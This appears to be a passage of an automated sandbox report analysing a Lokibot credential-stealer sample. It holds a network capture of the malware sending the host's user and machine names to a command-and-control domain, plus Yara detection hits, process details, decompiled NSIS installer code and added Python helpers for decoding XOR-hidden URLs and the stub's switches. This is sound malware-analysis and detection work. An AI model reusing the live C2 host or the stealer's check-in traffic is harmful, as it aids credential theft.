                  Nov 25, 2021 18:22:35.207289934 CET | 1115 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:35.268660069 CET | 1116 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Memory Usage

                  High Level Behavior Distribution

                  Behavior

                  System Behavior

                  General

                  Start time: 18:22:06
                  Start date: 25/11/2021
                  Path: C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase: 0x400000
                  File size: 301040 bytes
                  MD5 hash: 969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:22:08
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low
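The SUSP_XORed_URL_in_EXE hit on the 0x2430000 region above is the kind of finding worth reproducing by hand before trusting it. The block below is an added example, not code from this report and not Florian Roth's rule: it implements the idea the rule name describes (an `http://` or `https://` marker XORed with a single key byte) as a brute-force scan over a dump buffer. The buffer, key and URL it scans are constructed for the example; nothing in it is taken from the sample.

```python
"""Brute-force single-byte XOR-obfuscated URLs in a process memory dump.

Added example; not code from this report and not the SUSP_XORed_URL_in_EXE
rule itself. It re-implements the idea behind that rule name in plain Python
so a hit on a dump region can be reproduced and triaged without yara.
All input below is constructed, not bytes from the analysed sample.
"""

MARKERS = (b"http://", b"https://")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the single byte key."""
    return bytes(b ^ key for b in data)


def find_xored_urls(buf: bytes, max_len: int = 512) -> list:
    """Return sorted (offset, key, url) triples for every marker found under a
    single-byte XOR key 1..255.

    Key 0 (plaintext) is deliberately skipped: the point is to surface hidden
    URLs, plaintext ones are already visible to strings(1). Decoding runs
    forward until the first byte that is not printable ASCII after de-XOR,
    which is where a XORed NUL terminator lands."""
    hits = []
    for key in range(1, 256):
        for marker in MARKERS:
            needle = xor_bytes(marker, key)
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                end = pos
                while end < len(buf) and end - pos < max_len:
                    if not 0x21 <= (buf[end] ^ key) <= 0x7E:
                        break
                    end += 1
                hits.append((pos, key, xor_bytes(buf[pos:end], key).decode("ascii")))
                start = pos + 1
    return sorted(hits)


SAMPLE_KEY = 0x5A
SAMPLE_URL = b"http://c2.example.com/gate.php"   # constructed, not from the sample


def build_sample_dump() -> bytes:
    """Constructed stand-in for a memory dump: a PE-ish header, zero padding,
    one URL XORed together with its NUL terminator, then one plaintext URL
    that the scanner must not report."""
    return (
        b"MZ\x90\x00" + b"\x00" * 60
        + xor_bytes(SAMPLE_URL + b"\x00", SAMPLE_KEY)
        + b"\x00" * 32
        + b"https://plain.example.com\x00"
    )


if __name__ == "__main__":
    for off, key, url in find_xored_urls(build_sample_dump()):
        print(f"offset 0x{off:x} key 0x{key:02x} -> {url}")
```

On a real dump, feed the `.sdmp` file's bytes to `find_xored_urls` and compare the offsets against the Yara hit; the plaintext URL in the constructed buffer shows why a key of 0 is excluded, and the XORed terminator shows where decoding stops. To run the original rule rather than this re-implementation, yara-python's `yara.compile()` and `rules.match(data=...)` take the same bytes.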

                  Disassembly

                  Code Analysis

                    Executed Functions

                    C-Code - Quality: 83%
                    			// NSIS installer stub entry point: the "NSIS Error", "~nsu.tmp" and " _?=" strings below identify it.
                    			// _t99 accumulates switch flags (2 = /S silent, 4 = /NCRC skip CRC check); _v404 holds the current token terminator (' ' or '"').
                    			_entry_() {
                    				struct _SHFILEINFOA _v360;
                    				struct _SECURITY_ATTRIBUTES* _v376;
                    				char _v380;
                    				CHAR* _v384;
                    				char _v396;
                    				int _v400;
                    				int _v404;
                    				CHAR* _v408;
                    				intOrPtr _v412;
                    				int _v416;
                    				intOrPtr _v420;
                    				struct _SECURITY_ATTRIBUTES* _v424;
                    				void* _v432;
                    				int _t34;
                    				CHAR* _t39;
                    				char* _t42;
                    				signed int _t44;
                    				void* _t48;
                    				intOrPtr _t50;
                    				signed int _t52;
                    				signed int _t55;
                    				int _t56;
                    				signed int _t60;
                    				intOrPtr _t71;
                    				intOrPtr _t77;
                    				void* _t79;
                    				void* _t89;
                    				void* _t91;
                    				char* _t96;
                    				signed int _t97;
                    				void* _t98;
                    				signed int _t99;
                    				signed int _t100;
                    				signed int _t103;
                    				CHAR* _t105;
                    				signed int _t106;
                    				intOrPtr _t113;
                    				char _t120;
                    
                    				_v376 = 0;
                    				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                    				_t99 = 0;
                    				_v380 = 0x20;
                    				__imp__#17();
                    				_t34 = SetErrorMode(0x8001); // executed
                    				__imp__OleInitialize(0); // executed
                    				 *0x42ec18 = _t34;
                    				 *0x42eb64 = E00405C49(8);
                    				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                    				E0040592B("foxdilaoqebdbpxrsdbw Setup", "NSIS Error");
                    				_t39 = GetCommandLineA();
                    				_t96 = "\"C:\\Users\\hardz\\Desktop\\U001P56ybm.exe\" ";
                    				E0040592B(_t96, _t39);
                    				 *0x42eb60 = GetModuleHandleA(0);
                    				_t42 = _t96;
                    				if("\"C:\\Users\\hardz\\Desktop\\U001P56ybm.exe\" " == 0x22) {
                    					_v404 = 0x22;
                    					_t42 =  &M00434001;
                    				}
                    				_t44 = CharNextA(E00405449(_t42, _v404));
                    				_v404 = _t44;
                    				while(1) {
                    					_t91 =  *_t44;
                    					_t109 = _t91;
                    					if(_t91 == 0) {
                    						break;
                    					}
                    					__eflags = _t91 - 0x20;
                    					if(_t91 != 0x20) {
                    						L5:
                    						__eflags =  *_t44 - 0x22;
                    						_v404 = 0x20;
                    						if( *_t44 == 0x22) {
                    							_t44 = _t44 + 1;
                    							__eflags = _t44;
                    							_v404 = 0x22;
                    						}
                    						__eflags =  *_t44 - 0x2f;
                    						if( *_t44 != 0x2f) {
                    							L15:
                    							_t44 = E00405449(_t44, _v404);
                    							__eflags =  *_t44 - 0x22;
                    							if(__eflags == 0) {
                    								_t44 = _t44 + 1;
                    								__eflags = _t44;
                    							}
                    							continue;
                    						} else {
                    							_t44 = _t44 + 1;
                    							__eflags =  *_t44 - 0x53;
                    							if( *_t44 == 0x53) { // "/S" followed by ' ' or NUL (the | 0x20 test): silent install, bit 2 of _t99
                    								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                    								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                    									_t99 = _t99 | 0x00000002;
                    									__eflags = _t99;
                    								}
                    							}
                    							__eflags =  *_t44 - 0x4352434e; // 0x4352434e is "NCRC" as a little-endian dword: /NCRC skips the CRC check, bit 4 of _t99
                    							if( *_t44 == 0x4352434e) {
                    								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                    								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                    									_t99 = _t99 | 0x00000004;
                    									__eflags = _t99;
                    								}
                    							}
                    							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20; // 0x3d442f20 is " /D=": the rest of the line is the install directory and the command line is cut at that space
                    							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                    								 *((intOrPtr*)(_t44 - 2)) = 0;
                    								_t45 = _t44 + 2;
                    								__eflags = _t44 + 2;
                    								E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
                    								L20:
                    								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                    								GetTempPathA(0x400, _t105);
                    								_t48 = E004030AF(_t109);
                    								_t110 = _t48;
                    								if(_t48 != 0) {
                    									L22:
                    									DeleteFileA("1033"); // executed
                    									_t50 = E00402C0B(_t111, _t99); // executed
                    									_v412 = _t50;
                    									if(_t50 != 0) {
                    										L32:
                    										E00403464();
                    										__imp__OleUninitialize();
                    										if(_v408 == 0) {
                    											__eflags =  *0x42ebf4; // 0x0 -- reboot-requested flag; zero in this dump, so the privilege and ExitWindowsEx block below was not taken
                    											if(__eflags != 0) {
                    												_t106 = E00405C49(3); // E00405C49 resolves imports by index via GetProcAddress (see APIs below); the three call sites match OpenProcessToken, LookupPrivilegeValueA and AdjustTokenPrivileges
                    												_t100 = E00405C49(4);
                    												_t55 = E00405C49(5);
                    												__eflags = _t106;
                    												_t97 = _t55;
                    												if(_t106 != 0) {
                    													__eflags = _t100;
                    													if(_t100 != 0) {
                    														__eflags = _t97;
                    														if(_t97 != 0) {
                    															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396); // OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)
                    															__eflags = _t60;
                    															if(_t60 != 0) {
                    																 *_t100(0, "SeShutdownPrivilege",  &_v400); // LookupPrivilegeValueA(NULL, "SeShutdownPrivilege", &luid)
                    																_v416 = 1; // TOKEN_PRIVILEGES.PrivilegeCount
                    																_v404 = 2; // Attributes = SE_PRIVILEGE_ENABLED
                    																 *_t97(_v420, 0,  &_v416, 0, 0, 0); // AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)
                    															}
                    														}
                    													}
                    												}
                    												_t56 = ExitWindowsEx(2, 0); // EWX_REBOOT
                    												__eflags = _t56;
                    												if(_t56 == 0) {
                    													E0040140B(9);
                    												}
                    											}
                    											_t52 =  *0x42ec0c; // 0xffffffff
                    											__eflags = _t52 - 0xffffffff;
                    											if(_t52 != 0xffffffff) {
                    												_v400 = _t52;
                    											}
                    											ExitProcess(_v400);
                    										}
                    										E004051EC(_v408, 0x200010);
                    										ExitProcess(2);
                    									}
                    									_t113 =  *0x42eb7c; // 0x0 -- set only in an uninstaller build; zero here, so the ~nsu.tmp self-copy branch below is skipped and the installer proper (E00403489) runs
                    									if(_t113 == 0) {
                    										L31:
                    										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                    										_v400 = E00403489();
                    										goto L32;
                    									}
                    									_t103 = E00405449(_t96, 0);
                    									while(_t103 >= _t96) {
                    										__eflags =  *_t103 - 0x3d3f5f20; // 0x3d3f5f20 is " _?=": uninstaller marker, searched backwards from the end of the command line
                    										if(__eflags == 0) {
                    											break;
                    										}
                    										_t103 = _t103 - 1;
                    										__eflags = _t103;
                    									}
                    									_t115 = _t103 - _t96;
                    									_v408 = "Error launching installer";
                    									if(_t103 < _t96) {
                    										lstrcatA(_t105, "~nsu.tmp");
                    										_t101 = "C:\\Users\\hardz\\Desktop";
                    										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
                    											goto L32;
                    										}
                    										CreateDirectoryA(_t105, 0);
                    										SetCurrentDirectoryA(_t105);
                    										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                    										if(_t120 == 0) {
                    											E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
                    										}
                    										E0040592B(0x42f000, _v396);
                    										 *0x42f400 = 0x41; // 'A': first letter of the candidate copy names, incremented per attempt
                    										_t98 = 0x1a; // 26 attempts ('A'..'Z') to place a copy of this exe in ~nsu.tmp, the standard NSIS uninstaller self-copy
                    										do {
                    											_t71 =  *0x42eb70; // 0x6bfe70
                    											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                    											DeleteFileA(0x428b90);
                    											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\U001P56ybm.exe", 0x428b90, 1) != 0) {
                    												_push(0);
                    												_push(0x428b90);
                    												E00405679();
                    												_t77 =  *0x42eb70; // 0x6bfe70
                    												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                    												_t79 = E0040518B(0x428b90);
                    												if(_t79 != 0) {
                    													CloseHandle(_t79);
                    													_v416 = 0;
                    												}
                    											}
                    											 *0x42f400 =  *0x42f400 + 1;
                    											_t98 = _t98 - 1;
                    										} while (_t98 != 0);
                    										_push(0);
                    										_push(_t105);
                    										E00405679();
                    										goto L32;
                    									}
                    									 *_t103 = 0;
                    									_t104 = _t103 + 4;
                    									if(E004054FF(_t115, _t103 + 4) == 0) {
                    										goto L32;
                    									}
                    									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                    									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                    									_v424 = 0;
                    									goto L31;
                    								}
                    								GetWindowsDirectoryA(_t105, 0x3fb);
                    								lstrcatA(_t105, "\\Temp");
                    								_t89 = E004030AF(_t110);
                    								_t111 = _t89;
                    								if(_t89 == 0) {
                    									goto L32;
                    								}
                    								goto L22;
                    							}
                    							goto L15;
                    						}
                    					} else {
                    						goto L4;
                    					}
                    					do {
                    						L4:
                    						_t44 = _t44 + 1;
                    						__eflags =  *_t44 - 0x20;
                    					} while ( *_t44 == 0x20);
                    					goto L5;
                    				}
                    				goto L20;
                    			}
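The magic dword immediates in the listing above (0x4352434e, 0x3d442f20, 0x3d3f5f20) and the `| 0x20 == 0x20` delimiter test are the whole command-line parser of the NSIS stub. The block below is an added example, not part of the report and not NSIS's own source: it unpacks those constants back to ASCII and mirrors the decompiled loop so the flag bits that end up in `_t99` can be predicted for a given command line. Flag values and the delimiter test are taken from the listing; the switch meanings (/S silent, /NCRC skip CRC check, /D=<dir> install directory, _?=<dir> uninstaller marker) are standard NSIS.

```python
"""Decode the command-line handling in the NSIS _entry_ decompile.

Added example; not part of the report and not NSIS's own source. Flag bits
and the delimiter test follow the decompiled listing; the switch names are
standard NSIS behaviour.
"""
import struct

# little-endian dword immediates from the listing -> the ASCII they compare against
CONSTANTS = {
    0x4352434E: "NCRC",   # cmp [_t44], ...      -> /NCRC
    0x3D442F20: " /D=",   # cmp [_t44 - 2], ...  -> /D=<dir>
    0x3D3F5F20: " _?=",   # scanned backwards    -> uninstaller marker
}

FLAG_SILENT = 0x2   # _t99 |= 2 after "/S"
FLAG_NO_CRC = 0x4   # _t99 |= 4 after "/NCRC"


def dword_to_ascii(value: int) -> str:
    """Little-endian dword immediate -> the four ASCII bytes it encodes."""
    return struct.pack("<I", value).decode("ascii")


def _byte_at(s: str, k: int) -> int:
    """Byte at index k, or 0 (the NUL terminator) past the end of the string."""
    return ord(s[k]) if k < len(s) else 0


def parse_nsis_cmdline(cmdline: str):
    """Return (flags, install_dir, cmdline_after_parse), mirroring the loop.

    argv[0] is skipped (quoted, or up to the first blank). A switch only
    counts when the byte after it is ' ' or NUL, i.e. (b | 0x20) == 0x20.
    " /D=" takes the rest of the line as the install directory and truncates
    the command line at that space, exactly as *(_t44 - 2) = 0 does."""
    flags = 0
    install_dir = None
    if cmdline.startswith('"'):                            # _v404 = '"'
        close = cmdline.find('"', 1)
        i = len(cmdline) if close == -1 else close + 1     # CharNextA past the quote
    else:
        blank = cmdline.find(" ")
        i = len(cmdline) if blank == -1 else blank
    while i < len(cmdline):
        while i < len(cmdline) and cmdline[i] == " ":      # the L4 blank-skip loop
            i += 1
        if i >= len(cmdline):
            break
        term = " "                                         # _v404 = 0x20
        if cmdline[i] == '"':
            i += 1
            term = '"'                                     # _v404 = 0x22
        if cmdline[i:i + 1] == "/":
            i += 1
            if cmdline[i:i + 1] == "S" and (_byte_at(cmdline, i + 1) | 0x20) == 0x20:
                flags |= FLAG_SILENT
            if cmdline[i:i + 4] == "NCRC" and (_byte_at(cmdline, i + 4) | 0x20) == 0x20:
                flags |= FLAG_NO_CRC
            if cmdline[i - 2:i + 2] == " /D=":
                install_dir = cmdline[i + 2:]
                cmdline = cmdline[:i - 2]                  # *(_t44 - 2) = 0, then goto L20
                break
        # L15: advance to the token terminator (E00405449), step over a closing quote
        nxt = cmdline.find(term, i)
        i = len(cmdline) if nxt == -1 else nxt
        if i < len(cmdline) and cmdline[i] == '"':
            i += 1
    return flags, install_dir, cmdline


if __name__ == "__main__":
    for value, text in CONSTANTS.items():
        print(f"0x{value:08x} -> {dword_to_ascii(value)!r}")
    print(parse_nsis_cmdline('"C:\\Users\\user\\Desktop\\U001P56ybm.exe" /S /NCRC /D=C:\\Program Files\\Tool'))
```

Note that `"/S"` in quotes or `/Silent` does not set the flag, because the byte after `S` is `"` or `i` rather than a blank or NUL; that is the check the listing expresses as `( *(_t44 + 1) | 0x00000020) == 0x20`.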

                    APIs
                    • #17.COMCTL32 ref: 00403102
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                    • OleInitialize.OLE32(00000000), ref: 00403114
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                      • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00405938
                    • GetCommandLineA.KERNEL32(foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00403151
                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 00403164
                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000020), ref: 0040318F
                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                    • DeleteFileA.KERNELBASE(1033), ref: 00403256
                    • OleUninitialize.OLE32(00000000), ref: 004032D4
                    • ExitProcess.KERNEL32 ref: 004032F4
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,00000000), ref: 00403300
                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,00000000), ref: 0040330C
                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                    • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\U001P56ybm.exe,00428B90,00000001), ref: 0040337D
                    • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                    • ExitProcess.KERNEL32 ref: 0040345E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\U001P56ybm.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\U001P56ybm.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$foxdilaoqebdbpxrsdbw Setup$~nsu.tmp
                    • API String ID: 2278157092-646936170
                    • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                    • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                    • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                    • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			// NSIS delete helper: _a4 is the path, _a8 the flags. Bit 3 (0x8) deletes a single file;
                    			// otherwise the path is enumerated via "\*.*" with FindFirstFileA and subdirectories are recursed into (E004055E3).
                    			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				struct _WIN32_FIND_DATAA _v332;
                    				signed int _t37;
                    				char* _t49;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t61;
                    				signed int _t63;
                    				void* _t65;
                    				signed int _t68;
                    				CHAR* _t70;
                    				CHAR* _t72;
                    				char* _t75;
                    
                    				_t72 = _a4;
                    				_t37 = E004054FF(__eflags, _t72);
                    				_v12 = _t37;
                    				if((_a8 & 0x00000008) != 0) { // single-file delete: result folds to 1 when DeleteFileA fails, 0 on success, and is added to the counter at 0x42ebe8
                    					_t63 = DeleteFileA(_t72); // executed
                    					asm("sbb eax, eax");
                    					_t65 =  ~_t63 + 1;
                    					 *0x42ebe8 =  *0x42ebe8 + _t65;
                    					return _t65;
                    				}
                    				_t68 = _a8 & 0x00000001;
                    				__eflags = _t68;
                    				_v8 = _t68;
                    				if(_t68 == 0) {
                    					L5:
                    					E0040592B(0x42afe0, _t72);
                    					__eflags = _t68;
                    					if(_t68 == 0) {
                    						E00405465(_t72);
                    					} else {
                    						lstrcatA(0x42afe0, "\*.*");
                    					}
                    					__eflags =  *_t72;
                    					if( *_t72 != 0) {
                    						L10:
                    						lstrcatA(_t72, 0x40900c);
                    						L11:
                    						_t70 =  &(_t72[lstrlenA(_t72)]);
                    						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                    						__eflags = _t37 - 0xffffffff;
